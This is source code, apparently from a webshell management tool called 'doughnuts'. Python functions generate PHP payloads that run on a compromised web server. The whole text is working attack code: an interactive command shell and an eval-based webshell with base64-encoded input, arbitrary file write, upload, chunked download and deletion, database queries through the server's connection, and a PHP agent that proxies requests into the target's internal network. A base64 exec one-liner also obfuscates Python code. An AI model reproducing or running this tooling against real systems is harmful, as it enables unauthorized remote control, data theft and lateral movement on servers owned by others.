def run(*commands): """ shell Get a temporary shell of target system by system function or just run a shell command. """ command = str(value_translation(gget("raw_command_args"))) if (command): res = send(get_system_code(command)) if (not res): return print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n") return print( color.cyan( "Eenter interactive temporary shell...\n\nUse 'back' command to return doughnuts.\n" )) res = send( f'{get_system_code("whoami")}print("@".$_SERVER["SERVER_NAME"]."|".getcwd());' ).r_text.strip() prompt, pwd = res.split("|") set_namespace("webshell", False, True) wordlist = gget("webshell.wordlist") readline.set_wordlist(NEW_WINDOWS_WORDLIST if ( is_windows()) else NEW_UNIX_WORDLIST) if is_windows(): prompt = "%s> " else: prompt = prompt.replace("\r", "").replace("\n", "") + ":%s$ " try: while gget("loop"): print(prompt % pwd, end="") command = str(value_translation(readline())) lower_command = command.lower() if (lower_command.lower() in ['exit', 'quit', 'back']): print() break if (command == ''): print() continue b64_pwd = base64_encode(pwd) if (lower_command.startswith("cd ") and len(lower_command) > 3): path = base64_encode(lower_command[3:].strip()) res = send( f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());' ) if (not res): return pwd = res.r_text.strip() else: res = send(f'chdir(base64_decode(\'{b64_pwd}\'));' + get_system_code(command)) if (not res): return print("\n" + res.r_text.strip() + "\n") finally: readline.set_wordlist(wordlist)
def run(*commands): """ webshell Get a webshell of target system or just run a webshell command. """ command = gget("raw_command_args") if (command): res = send((command)) if (not res): return print(color.green("\nResult:\n\n") + res.r_text.strip() + "\n") return print( color.cyan( "Eenter interactive temporary webshell...\n\nUse 'back' command to return doughnuts.\n" )) pwd = send(f'print(getcwd());').r_text.strip() set_namespace("webshell", False, True) wordlist = gget("webshell.wordlist") readline.set_wordlist(NEW_WORDLIST) try: while gget("loop"): print(f"webshell:{pwd} >> ", end="") data = readline(b"(") lower_data = data.lower() if (lower_data.lower() in ['exit', 'quit', 'back']): print() break if (data == ''): print() continue data = base64_encode(data) b64_pwd = base64_encode(pwd) if (lower_data.startswith("cd ") and len(lower_data) > 3): path = base64_encode(lower_data[3:].strip()) res = send( f'chdir(base64_decode(\'{b64_pwd}\'));chdir(base64_decode(\'{path}\'));print(getcwd());' ) if (not res): return pwd = res.r_text.strip() else: res = send( f'eval("chdir(base64_decode(\'{b64_pwd}\'));eval(base64_decode(\'{data}\'));");' ) if (not res): return print("\n" + res.r_text.strip() + "\n") finally: readline.set_wordlist(wordlist)
def run(web_file_path: str, editor: str = ""): """ write Write files directly to the target system by notepad / vi as default or your own editor. eg: write {web_file_path} {editor=""} """ file_name = str(uuid4()) file_path = gget("webshell.download_path", "webshell") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name).replace("\\", "/") open(real_file_path, 'a').close() open_editor(real_file_path, editor) with open(real_file_path, "r") as f: result = base64_encode(f.read()) res = send( f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));" ) if (not res): return text = res.r_text.strip() if (match(r"\d+", text)): print(color.green(f"\nWrite {web_file_path} success.\n")) else: print(color.red(f"\nWrite {web_file_path} failed.\n")) remove(real_file_path)
def get_php(command, database): connect_type = gget("db_connect_type", "webshell") connect_code = get_connect_code(dbname=database) command = base64_encode(command) if (connect_type == "pdo"): return """try{%s $r=$con->query(base64_decode('%s')); $rows=$r->fetchAll(PDO::FETCH_ASSOC); foreach($rows[0] as $k=>$v){ echo "$k*,"; } echo "\\n"; foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";} } catch (PDOException $e){ die("Connect error: ". $e->getMessage()); }""" % (connect_code, command) elif (connect_type == "mysqli"): return """%s $r=$con->query(base64_decode('%s')); $rows=$r->fetch_all(MYSQLI_ASSOC); foreach($rows[0] as $k=>$v){ echo "$k*,"; } echo "\\n"; foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}""" % ( connect_code, command) else: return ""
def run(web_file_path: str): """ write Write files directly to the target system by notepad/vi. eg: write {web_file_path} """ file_name = path.split(web_file_path)[1] file_path = gget("webshell.download_path", "webshell").replace(":", "_") if not path.exists(file_path): makedirs(file_path) real_file_path = path.join(file_path, file_name) with open(real_file_path, "w"): pass open_editor(real_file_path) with open(real_file_path, "r") as f: result = base64_encode(f.read()) res = send( f"print(file_put_contents('{web_file_path}', base64_decode('{result}')));" ) if (not res): return text = res.r_text.strip() if (match(r"\w+", text) and text != '0'): print(color.green(f"\nWrite {web_file_path} success.\n")) else: print( color.red(f"\nWrite {web_file_path} failed.") + color.yellow("\n\nResponse:") + f"\n{text}\n") remove(real_file_path)
def get_php(web_file_path: str, force: bool): web_file_path = base64_encode(web_file_path) return """if (isset($_FILES)){ if (%s and file_exists(base64_decode("%s"))){ print("exist"); } else if (move_uploaded_file($_FILES["file"]["tmp_name"], base64_decode("%s"))){ print("success"); } }""" % (str(not force).lower(), web_file_path, web_file_path)
def get_php_force(web_file_path: str, force): web_file_path = base64_encode(web_file_path) return """if (not is_writable(base64_encode("%s"))) { echo "not writable"; } else if (%s and file_exists(base64_decode("%s"))){ print("exist"); } else{ unlink(base64_decode("%s")); }""" % (web_file_path, str(not force).lower(), web_file_path, web_file_path)
def get_php(web_file_path: str): return ("""function download($fd){ if (@file_exists($fd)){ $fileinfo = pathinfo($fd); header("Content-type: application/x-" . $fileinfo["extension"]); header("Content-Disposition: attachment; filename=" . $fileinfo["basename"]); @readfile($fd); } } download(base64_decode("%s")); """ % base64_encode(web_file_path))
def get_data_php(web_file_path: str, offset: int, blocksize: int): return """function download($file, $offset, $size) { $fp = @fopen($file,'rb'); if ($fp){ fseek($fp, $offset); echo base64_encode(gzdeflate(fread($fp, $size))); } } download(base64_decode("%s"), %s, %s); """ % (base64_encode(web_file_path), offset, blocksize)
def get_php_decode(web_file_path: str, total_number: int): web_file_path = base64_encode(web_file_path) return """function gzipdecode($data) { return gzinflate(substr($data,10,-8)); } $p=base64_decode("%s"); $data=""; $f=true; for($i=0;$i<%s;$i++){ $pp="$p.tmp$i";if(filesize($pp)!==0){ $data .= file_get_contents($pp);unlink($pp); } else { $f=false; break; } } if($f){ $data=gzipdecode(base64_decode($data)); file_put_contents($p, $data); if(file_exists($p) && filesize($p) !== 0){echo "success ".md5($data);} }""" % (web_file_path, total_number)
def get_php_decode(web_file_path: str, number: int): return """ $p=base64_decode("%s"); $data=""; $f=true; $fp=@fopen($p, 'wb'); if (fp){ for($i=0;$i<%s;$i++){ $pp="$p.tmp$i"; if(filesize($pp)!==0){ $data=gzinflate(base64_decode(file_get_contents($pp))); fwrite($fp, $data); fflush($fp); unlink($pp); } else { $f=false; break; } } } fclose($fp); if($f){ if(file_exists($p) && filesize($p) !== 0){echo "success";} }""" % (base64_encode(web_file_path), number)
def get_php_clean(web_file_path: str, number: int): return """for($i=0;$i<%s;$i++){ unlink(base64_decode("%s").".tmp$i"); }""" % (number, base64_encode(web_file_path))
def get_php_upload(web_file_path: str, data: str, number: int): web_file_path = base64_encode(web_file_path + ".tmp%s" % number) return """$p=base64_decode("%s");file_put_contents($p, "%s");if(filesize($p) !== 0){echo "success";}""" % ( web_file_path, data)
def get_php(request_target, request_method, request_redirect_method, request_data, request_params, request_cookie, redirect_auto, redirect_cookie_use, timeout, type): return base64_encode(""" # 代理目标 $REQUEST_URL= "%s"; # 代理请求方法 $REQUEST_METHOD= '%s'; # 遇到跳转时的请求方法 $REQUEST_REDIRECT_METHOD = '%s'; # POST数据 $REQUEST_DATA='%s'; # GET数据 $REQUEST_PARAMS='%s'; # COOKIE数据 $REQUEST_COOKIE='%s'; # 是否自动跳转 $REDIRECT_AUTO = %d; # 跳转时使用自动获取的COOKIE $REDIRECT_COOKIE_USE = %d; # 超时时间 $TIMEOUT = %f; # 有4种。 # 前3种分别对应 socket file_get_contents curl 的内网代理 # 最后1种是单纯的file_get_contents(),可以玩php伪协议 $TYPE = %d; class Agent{ private $page_content; private $type; private $timeout; private $redirect_auto; private $redirect_cookie_use; private $request_method; private $request_redirect_method; private $request_allowed_method; private $request_params; private $request_data; private $request_cookie; private $request_url; private $request_url_group; private $current_url; private $header_data; private function get_cookie($header_lines){ foreach ($header_lines as $line) { preg_match_all('/set-cookie:(.*)/i', $line, $cookie); if (@$cookie[1][0] != NULL) { return trim($cookie[1][0]); } } return false; } private function get_redirect($header_lines){ foreach($header_lines as $line){ preg_match_all('/location:(.*)/i',$line,$url); if(@$url[1][0]!=NULL){ return trim($url[1][0]); } } return false; } private function get_params($params){ $re_params=[]; if($params == '') return [''=>'']; foreach(explode('&',$params) as $line){ $key_value=explode('=',$line); $re_params[urldecode(isset($key_value[0])?$key_value[0]:'')]=urldecode(isset($key_value[1])?$key_value[1]:''); } return $re_params; } private function get_query($params_group){ return isset($params_group['']) and $params_group['']=='' ? '' : http_build_query($params_group); } private function url_cut($url){ return parse_url($url); } private function get_host($url){ $url_group=$this->url_cut($url); if(isset($url_group['scheme'])){ return $url; }else{ return $url_group['scheme'].'://'.$url_group['host'].(isset($url_group['port'])?'':':'.$url_group['port']); } } private function get_element($host,$body){ preg_match_all("/<link[\s\S]*?href=['\\"](.*?[.]css.*?)[\\"'][\s\S]*?>/i", $body, $css); preg_match_all("/<script[\s\S]*?src=['\\"](.*?[.]js.*?)[\\"'][\s\S]*?>/i", $body, $js); foreach ($css[1] as $css_url) { $body .= "<style>".@file_get_contents(strpos($css_url, 'http://') == false ? $host . '/' . $css_url:$css_url)."</style>"; } foreach ($js[1] as $js_url) { $body .= "<script>" . @file_get_contents(strpos($js_url, 'http://') == false ? $host . '/' . $js_url : $js_url) . "</script>"; } $body.="\\n<!-- \\n<CurrentUrl>".base64_encode($this->current_url)."</CurrentUrl>"; $body.="<CurrentCookie>".base64_encode($this->request_cookie)."</CurrentCookie>"; $body.="<CurrentHeader>"; if(is_array($this->header_data)){ foreach($this->header_data as $tag){ if($tag){ $body.=base64_encode("[{$tag}]")."|"; } } } $body.="</CurrentHeader>"; $body.="<CurrentStatus>success</CurrentStatus>\\n -->"; return $body; } private function get302_socket($url) { try { $result=""; $url_group = $this->url_cut($url); $fp = @fsockopen($url_group['host'], isset($url_group['port']) ? $url_group['port'] : (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80), $erro, $errostr, $this->timeout); if (!$fp) { throw new Exception("Can't connect```"); } else { if(in_array($this->request_redirect_method,$this->request_allowed_method)){ if ($this->request_redirect_method === 'POST') { $r = 'POST ' . $url_group['path'] . " HTTP/1.1\\r\\n"; $type = "application/x-www-form-urlencoded"; $len = 0; } else { $r = 'GET ' . $url_group['path'] . " HTTP/1.1\\r\\n"; $type = ''; $len = 0; } } $r .= "Host: " . $url_group['host'] . ':' . (isset($url_group['port']) ? $url_group['port'] : (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80')) . "\r\n"; $r .= $this->request_cookie ? "Cookie: " . $this->request_cookie . "\\r\\n":''; $r .= "Content-Type: " . $type . "\\r\\n"; $r .= "Content-Length: " . $len . "\\r\\n"; $r .= "Connection: close\\r\\n\\r\\n"; fputs($fp, $r); while (!feof($fp)) { $result .= fgets($fp, 1024); } fclose($fp); if ($result) { list($header, $body) = explode("\\r\\n\\r\\n" , $result, 2); preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", explode("\\r\\n", $header)[0], $code); $header = explode("\\r\\n",$header); $this->header_data = $header; if (300 <= $code[1] and $code[1] < 400) { $redirect_url = $this->get_redirect($header); $cookie = $this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($url).$redirect_url; }else{ $redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_socket($redirect_url) : $body; } else { return $body; } } } } catch (Exception $e) { die("File_Get_Contents_Redirect_error #:" . $e); } } private function get302_fg($url) { try { $url_group = $this->url_cut($url); if (in_array($this->request_redirect_method, $this->request_allowed_method)) { if ($this->request_redirect_method === 'POST') { $type = "application/x-www-form-urlencoded"; } } $opts = array( 'http' => array( 'method' => $this->request_method, 'timeout' => $this->timeout, 'header' => 'Content-Type: ' . (isset($type) ? '' : $type) . "\\r\\n" . 'Content-Length: 0' . "\\r\\n". ($this->request_cookie ? 'Cookie: ' . $this->request_cookie . "\\r\\n":'' ) ) ); $context = stream_context_create($opts); $body = @file_get_contents($url, false, $context); $result = $http_response_header; $this->header_data = $result; preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", $result[0], $code); if (300 <= $code[1] and $code[1] < 400) { $redirect_url = $this->get_redirect($result); $cookie = $this->get_cookie($result) ? $this->get_cookie($result) : $this->request_cookie; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($url).$redirect_url; }else{ $redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_fg($redirect_url) : ($body === false ? "Can't fetch contents```" : $body); } else { return $body === false ? "Can't fetch contents```" : $body; } } catch (Exception $e) { die("File_Get_Contents_Redirect_error #:" . $e); } } private function get302_c($url){ try{ $r = curl_init(); $url_group = $this->url_cut($url); curl_setopt($r, CURLOPT_URL, $url); curl_setopt($r, CURLOPT_RETURNTRANSFER, 1); curl_setopt($r, CURLOPT_CONNECTTIMEOUT, $this->timeout); curl_setopt($r, CURLOPT_HEADER, true); if($this->request_cookie){ curl_setopt($r,CURLOPT_COOKIE,$this->request_cookie); } if(in_array($this->request_redirect_method,$this->request_allowed_method)){ if ($this->request_redirect_method === 'POST') { curl_setopt($r, CURLOPT_POST, 1); } } $result = curl_exec($r); if($result){ $header_size = curl_getinfo($r, CURLINFO_HEADER_SIZE); $header = explode("\\r\\n", substr($result, 0, $header_size)); $body = substr($result, $header_size); $status_code = intval(curl_getinfo($r, CURLINFO_HTTP_CODE)); $this->header_data = $header; curl_close($r); if (300 <= $status_code and $status_code < 400) { $redirect_url = $this->get_redirect($header); $cookie = $this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($url).$redirect_url; }else{ $redirect_url = $url_group['scheme'].'://'.$url_group['host']. ':' . (isset($url_group['port']) ? $url_group['port'] : '80').(isset($url_group['path'])?($url_group['path'] == '/'?'/':substr($url_group['path'],0,strripos($url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_c($redirect_url) : $body; }else{ return $body; } } } catch(Exception $e){ die("CURL_Redirect_error #:" . $e); } } public function getContent_sock() { try { $result = ''; $fp = @fsockopen($this->request_url_group['host'], isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80, $erro, $errostr, $this->timeout); if (!$fp) { var_dump($this->request_url_group['scheme'] . '://' . $this->request_url_group['host'] . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/' . '?' . $this->get_query($this->request_params))); var_dump(isset($this->request_url_group['port']) ? $this->request_url_group['port'] : 80); throw new Exception("Can't connect```"); } else { if (in_array($this->request_method, $this->request_allowed_method)) { if ($this->request_method === 'POST') { $r = 'POST ' . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/') . '?' . $this->get_query($this->request_params) . " HTTP/1.1\r\n"; $type = "application/x-www-form-urlencoded"; $len = strlen($this->get_query($this->request_data)); } else { $r = 'GET ' . (isset($this->request_url_group['path']) ? $this->request_url_group['path'] : '/') . '?' . $this->get_query($this->request_params) . " HTTP/1.1\r\n"; $type = ''; $len = 0; } } $r .= "Host: " . $this->request_url_group['host'] . ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80') . "\r\n"; $r .= $this->request_cookie ? "Cookie: " . $this->request_cookie . "\\r\\n" : ''; $r .= "Content-Type: " . $type . "\\r\\n"; $r .= "Content-Length: " . $len . "\\r\\n"; $r .= "Connection: close\\r\\n"; $r .= "\\r\\n" . $this->get_query($this->request_data); fputs($fp, $r); while (!feof($fp)) { $result .= fgets($fp, 1024); } fclose($fp); if ($result) { list($header, $body) = explode("\\r\\n\\r\\n" , $result, 2); preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", explode("\\r\\n", $header)[0], $code); $header = explode("\\r\\n",$header); $this->header_data = $header; if (300 <= $code[1] and $code[1] < 400) { $redirect_url = $this->get_redirect($header); $cookie = $this->redirect_cookie_use ? ($this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie) : ''; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($this->request_url).$redirect_url; }else{ $redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_socket($redirect_url) : $body; } else { return $body; } } } } catch (Exception $e) { die("SOCKET_error #:" . $e); } } public function getContent_fg(){ try{ if(in_array($this->request_method,$this->request_allowed_method)){ if($this->request_method === 'POST'){ $type = "application/x-www-form-urlencoded"; } } $opts = array( 'http'=>array( 'method' => $this->request_method, 'content' => $this->get_query($this->request_data), 'timeout' => $this->timeout, 'header' => 'Content-Type: '.(isset($type)?'':$type)."\\r\\n". 'Content-Length: '.strlen($this->get_query($this->request_data))."\\r\\n". ($this->request_cookie ? 'Cookie: ' . $this->request_cookie . "\\r\\n" : '') ) ); $context = stream_context_create($opts); $body = @file_get_contents($this->request_url.'?'.$this->get_query($this->request_params),false,$context); $result = $http_response_header; $this->header_data = $result; preg_match("#HTTP/[0-9\.]+\s+([0-9]+)#", $result[0], $code); if (300 <= $code[1] and $code[1] < 400) { $redirect_url = $this->get_redirect($result); $cookie = $this->redirect_cookie_use ? ($this->get_cookie($result) ? $this->get_cookie($result) : $this->request_cookie) : ''; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($this->request_url).$redirect_url; }else{ $redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_fg($redirect_url) : ($body===false?"Can't fetch contents```":$body); }else{ return $body === false ? "Can't fetch contents```" : $body; } } catch(Exception $e){ die("File_Get_Contents_error #:" . $e); } } public function getContent_c(){ try{ if(in_array($this->request_method,$this->request_allowed_method)){ $curl = curl_init(); curl_setopt($curl,CURLOPT_URL,$this->request_url.'?'.$this->get_query($this->request_params)); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,$this->timeout); curl_setopt($curl,CURLOPT_HEADER,true); if($this->request_cookie){ curl_setopt($curl,CURLOPT_COOKIE,$this->request_cookie); } if (in_array($this->request_method, $this->request_allowed_method)) { if($this->request_method === 'POST'){ curl_setopt($curl,CURLOPT_POST,1); curl_setopt($curl,CURLOPT_POSTFIELDS,$this->get_query($this->request_data)); } } $result = curl_exec($curl); if($result){ $header_size = curl_getinfo($curl,CURLINFO_HEADER_SIZE); $header = explode("\\r\\n",substr($result,0,$header_size)); $body = substr($result,$header_size); $status_code = intval(curl_getinfo($curl,CURLINFO_HTTP_CODE)); $this->header_data = $header; curl_close($curl); if(300 <= $status_code and $status_code < 400){ $redirect_url = $this->get_redirect($header); $cookie = $this->redirect_cookie_use ? ($this->get_cookie($header) ? $this->get_cookie($header) : $this->request_cookie) : ''; if($this->redirect_cookie_use and $cookie != ''){ $this->request_cookie = $cookie; } if(stripos($redirect_url,'http://') == false){ if($redirect_url[0] == '/'){ $redirect_url = $this->get_host($this->request_url).$redirect_url; }else{ $redirect_url = $this->request_url_group['scheme'].'://'.$this->request_url_group['host']. ':' . (isset($this->request_url_group['port']) ? $this->request_url_group['port'] : '80').(isset($this->request_url_group['path'])?($this->request_url_group['path'] == '/'?'/':substr($this->request_url_group['path'],0,strripos($this->request_url_group['path'],'/') + 1)):'/').$redirect_url; } } $this->current_url = $redirect_url; return $this->redirect_auto ? $this->get302_c($redirect_url) : $body; }else{ return $body; } } } } catch (Exception $e) { die("CURL_error #:" . $e); } } public function get_content(){ $contents = @file_get_contents($this->request_url); return $contents === false ? "Can't fetch contents```" : $contents; } public function __construct($request_url,$request_method,$request_redirect_method,$redirect_auto,$redirect_cookie_use,$params,$data,$cookie,$timeout,$type){ $this->request_url = $request_url; $this->request_url_group = $this->url_cut($request_url); $this->current_url = $request_url; $this->request_method = $request_method; $this->request_redirect_method = $request_redirect_method; $this->redirect_auto = $redirect_auto; $this->redirect_cookie_use = $redirect_cookie_use; $this->request_params = $this->get_params($params); $this->request_data = $this->get_params($data); $this->request_cookie = $cookie; $this->request_allowed_method = ['GET','POST']; $this->timeout = $timeout; $this->type = $type; } public function __toString(){ switch($this->type){ case 1: $this->page_content = $this->get_element($this->request_url,$this->getContent_sock()); break; case 2: $this->page_content = $this->get_element($this->request_url, $this->getContent_fg()); break; case 3: $this->page_content = $this->get_element($this->request_url, $this->getContent_c()); break; case 4: $this->page_content = $this->get_content(); break; } return $this->page_content; } } $this_request = new Agent($REQUEST_URL,$REQUEST_METHOD,$REQUEST_REDIRECT_METHOD,$REDIRECT_AUTO,$REDIRECT_COOKIE_USE,$REQUEST_PARAMS,$REQUEST_DATA,$REQUEST_COOKIE,$TIMEOUT,$TYPE); echo $this_request; """ % (request_target, request_method, request_redirect_method, request_data, request_params, request_cookie, redirect_auto, redirect_cookie_use, timeout, type))
def oneline_python(code: str): return '''python -c "exec(\\"exec(__import__('base64').b64decode('%s'.encode()).decode())\\")"''' % base64_encode(code)
def get_php(command, database): return """%s $r=$con->query(base64_decode('%s')); $rows=$r->fetch_all(MYSQLI_ASSOC); foreach($rows[0] as $k=>$v){ echo "$k*,"; } echo "\\n"; foreach($rows as $array){foreach($array as $k=>$v){echo "$v*,";};echo "\\n";}""" % (get_connect_code(dbname=database), base64_encode(command))
def get_filesize_php(web_file_path: str): return """echo filesize(base64_decode("%s")); """ % (base64_encode(web_file_path))
def get_php(web_file_path): return """if(unlink(base64_decode("%s"))){echo 'success';}""" % base64_encode( web_file_path)